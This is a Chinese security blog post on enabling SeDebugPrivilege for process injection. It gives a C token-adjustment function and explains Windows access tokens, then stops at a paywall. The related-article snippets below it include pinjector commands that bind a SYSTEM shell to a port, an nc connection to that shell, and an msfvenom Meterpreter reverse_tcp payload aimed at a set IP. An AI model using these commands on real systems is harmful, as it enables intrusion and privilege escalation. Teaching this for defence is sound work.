进程注入之进程提权

最新推荐文章于 2023-06-22 15:03:44 发布
最新推荐文章于 2023-06-22 15:03:44 发布
阅读量1.1k 收藏 7
点赞数 3
分类专栏: 进程注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wgpsec/article/details/117551717
版权
本文详细介绍了进程注入中的提权技术,包括常规提权和高级提权手法。通过OpenProcessToken、LookupPrivilegeValue、AdjustTokenPrivileges等API,使能进程权限,以实现对其他进程的写权限,进行进程注入。文中还分析了ZwAdjustPrivilegesToken函数在提权过程中的作用,并提供了示例代码。
摘要由CSDN通过智能技术生成

本文作者:Gality
本文字数:7928字
阅读时长:20分钟
本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。
狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

最近在研究进程注入相关的东西,主要是参考process-inject项目,想自己实现上面的所有进程注入手法,并弄清楚其中的原理。在进程注入中,首先就需要先将当前进程提权,才能取得对其他进程内存的写权限,完成进程注入,故这篇文章主要以进程注入来说提权的相关的知识。

常规提权手法

首先是常规的进程提权方式,完全可以不理解下面的代码的含义,只需要在进程需要获取SeDebugPrivilege权限时复制该段代码并在最开始调用即可获得权限

BOOL EnableDebugPrivilege() {
   
    HANDLE TokenHandle = NULL;
    TOKEN_PRIVILEGES TokenPrivilege;

    LUID uID;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle)) {
   
        if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &uID)) {
   
            TokenPrivilege.PrivilegeCount = 1;
            TokenPrivilege.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
            TokenPrivilege.Privileges[0].Luid = uID;
            if (AdjustTokenPrivileges(TokenHandle, FALSE, &TokenPrivilege, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
   
                CloseHandle(TokenHandle);
                TokenHandle = INVALID_HANDLE_VALUE;
                return TRUE;
            }
            else
                goto Fail;

        }
        else
            goto Fail;
    }
    else
        goto Fail;

Fail:
    CloseHandle(TokenHandle);
    TokenHandle = INVALID_HANDLE_VALUE;
    return FALSE;
}

解释

在进程注入时,要对一个任意进程(包括系统安全进程和服务进程)进行指定了**写相关**的访问权的OpenProcess操作,只要当前进程具有SeDeDebug权限就可以了。要是一个用户是Administrator或是被给予了相应的权限,就可以具有该权限。可是,就算我们用Administrator帐号对一个系统安全进程执行OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessID)还是会遇到“访问拒绝”的错误。

这是因为在默认的情况下进程的一些访问权限是没有被使能(Enabled)的,所以我们要做的首先是使能这些权限。与此相关的一些API函数有OpenProcessToken、LookupPrivilegevalue、AdjustTokenPrivileges。如果我们要修改一个进程的访问令牌

windows的每个用户登录系统后,系统会产生一个访问令牌(access token),其中关联了当前用户的权限信息,用户登录后创建的每一个进程都含有用户access token的拷贝,当进程试图执行某些需要特殊权限的操作或是访问受保护的内核对象时,系统会检查其acess token中的权限信息以决定是否授权操作。

Administrator组成员的access token中会含有一些可以执行系统级操作的特权(privileges),如终止任意进程、关闭/重启系统、加载设备驱动和更改系统时间等,不过这些特权默认是被禁用的,当Administrator组成员创建的进程中包含一些需要特权的操作时,进程必须首先打开这些禁用的特权以提升自己的权限,否则系统将拒绝进程的操作。注意,非Administrator组成员创建的进程无法提升自身的权限

首先要获得进程访问令牌的句柄,这可以通过OpenProcessToken得到,函数的原型如下:

BOOL OpenProcessToken
最低0.47元/天 解锁文章
WgpSec狼组安全团队
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
进程提权
`小明湖畔.。のBlog
02-17 1754
HANDLE tokenHandle;//获得令牌句柄BOOL bRet = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &tokenHandle);if (bRet){TOKEN_PRIVILEGES tokenPri;tokenPri.PrivilegeCount = 1;//tokenPri.Privileges数组的大小
对当前进程进行提升权限
网站开发初中级代码参考-转载
02-08 151
对于进程提升权限主要用到下面三个API OpenProcessToken();打开权限令牌 LookupPrivilegeValue();检索一个唯一的本地标识符 LUID AdjustTokenPrivileges();调整令牌特权  BOOL OpenProcessToken(    HANDLE ProcessHandle, //要修改访问权限的进程句柄   DWORD...
提权注入进程提权
weixin_34008784的博客
12-31 594
注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】 注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。 下面是图文教程。 0x01 从http://www.tarasco.org/security/Process_Injector/ 下载pinjecto...
Windows提权进程注入、Unattended Installs提权
negnegil的博客
09-12 933
进程注入提权 使用 pinjector.exe 注入到system用户的进程中,使该进程绑定在0.0.0.0:port ,并建立监听端口,攻击者从攻击机上主动连接该地址,获取到系统的system权限 注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现 下载pinjector.exe https://www.tarasco.org/security/Process_Injector/index.html 上传 pinjector.exe到靶机可执行目录 ##列取所有进程 pinje
多种进程注入源码与二进制文件
06-28
进程注入中,如果注入的代码包含获取更高权限的逻辑,就可能实现提权。这在系统安全中是个严重问题,因为一旦攻击者获得管理员权限,他们可以访问系统的所有资源,进行恶意操作。 这些技术在系统调试、软件开发、...
实现进程注入的示例代码
11-17
实现进程注入的示例代码 实现注入的代码 有c# vb6 和 vc++6 三个版本 注入的dll是用vc++写的一个dll 也附带源码 【测试的dll】 编译的是被注入的dll代码 其他三个文件夹是三种实现注入的语言 需要再代码中修改下...
权限提升-linux提权手法总结
01-14
内核漏洞是最常见的提权方式之一。一旦发现合适的内核漏洞,就可以编写或使用现成的漏洞利用代码来提升权限。常用的内核漏洞包括: - **CVE编号**:如CVE-2017-1000364等已知的安全漏洞。 - **Exploit-DB**:这是一...
服务Dll注入Svchost进程
08-31
2、注入到svchost进程 3、服务打开计算器(涉及到session,知识点) 4、线程输出时间debugview中查看 程序安装完服务,服务启动有以下方式: 1、重启电脑,使用电脑自带svhost服务组自启动服务; 2、手动执行脚本...
lpk.rar_delphi 提权_提权
09-21
标题中的"lpk.rar_delphi 提权_提权"表明这是一个与Delphi编程语言相关的提权(Privilege Escalation)技术,特别是通过一个名为"lpk.dll"的动态链接库来实现。在Windows系统中,提权是指非管理员用户获取更高的系统...
易语言 进程提权模块
04-28
易语言进程提权模块易语言进程提权模块易语言进程提权模块
Windows进程注入提权
星落的博客
05-12 1502
通过进程注入不会创建新的进程,隐蔽性比较高,可以通过"pinjector"工具实现进程注入 工具使用方法 pinjector.exe -l 查看可利用的进程 pinjector.exe -p pid cmd port 对pid进程执行注入,并建立侦听端口 pinjector.exe -p 428 cmd 4444 nc -nv 192.168.31.132 4444获得system权限的shell。 ...
【Windows提权进程注入提权
ssrf
03-04 1446
介绍 获取当前操作系统进程中所拥有的权限 注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】 注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。 攻击过程 使用工具列出当前操作系统的所有进程 pinjector.exe -l 可以看到不同的进程对应不同PID和用户。 执行pinjector.exe -p 600 cmd 2345注入进程pid为600的进程,使用端口23
提权技术之给任意进程提权(我们以OD,CE为例)
最新发布
a756598009的博客
06-22 873
赋予进程某种特殊权限 也叫提升读写权限 那么为什么要提升读写的权限呢 如果我们想修改游戏内存数据 数字的话正常情况下我们无法进行跨进程内存读写 这时候就可以使用 提升自身辅助进程的权限 来达到能读写游戏内存的效果那提权的原理又是什么呢?游戏虽然做了自身的进程保护 不允许其他进程读写 但是我们电脑系统本身就是有系统自带的进程winlogon.exe 这进程为例,这个进程是可以随意读写游戏内存的 游戏的保护也会过滤掉系统进程对自身的读写,
提权_Windows 2003 进程注入提权
草木
11-22 1721
1.首先使用Process Injector进程注入工具,使用命令查看运行进程的PID pinjector.exe -l 这里我们注入进程services.exe,可以看到它是系统权限运行的进程,记住的它的PID:356 2.接着使用命令注入刚才记住的进程,监听端口设置为9988 pinjector.exe -p 356 cmd.exe 9988 3.最后我们使用 nc 监听本地9988的端口 使用命令 whoami 可以看到注入提权成功。 ...
windows权限提升——windows2003进程注入提升(本地)
W小哥
12-03 4061
一、进程注入简介 进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在Windows2008之前操作系统上。所以我们需要学习后续的本地提权更多的手法才能针对高版本的系统。 版本: Windows2008之前 1.1 提权教程 演示环境:windows2003 1、将pinjector工具上传到目标服务器,运行以下命令 pinjector.exe       //运行命令,查看用法 pinjector.exe -l //列出可注入进程 pin
Windows下的进程提权
weixin_43742894的博客
04-22 1309
为什么需要进程提权? 在我们进行某些操作的时候,常常会提示权限不足的提示,这时就需要提升自己进程到系统权限。 原理: windows的每个用户登录系统后,系统会产生一个访问令牌(access token),其中关联了当前用户的权限信息,用户登录后创建的每一个进程都含有用户access token的拷贝,当进程试图执行某些需要特殊权限的操作或是访问受保护的内核对象时,系统会检查其acess tok...
权限提升-令牌窃取&进程注入-提权
weixin_45701675的博客
11-19 387
令牌窃取 演示服务器: Win2012 腾讯云服务器 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。 所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。 本地权限 - Test in Win2012腾讯云服务器 msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe 配置监听会话 use exploit/multi/han...
SQLmap使用指南:数据库提权与Webshell获取
4. UDF(User Defined Function)提权 在MySQL的sql-shell下,UDF可以被用来提升权限。攻击者可以利用这个功能来执行恶意代码或获取更高级的访问权限。 需要注意的是,尽管SQLmap提供了这些功能,但实际测试时并非...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值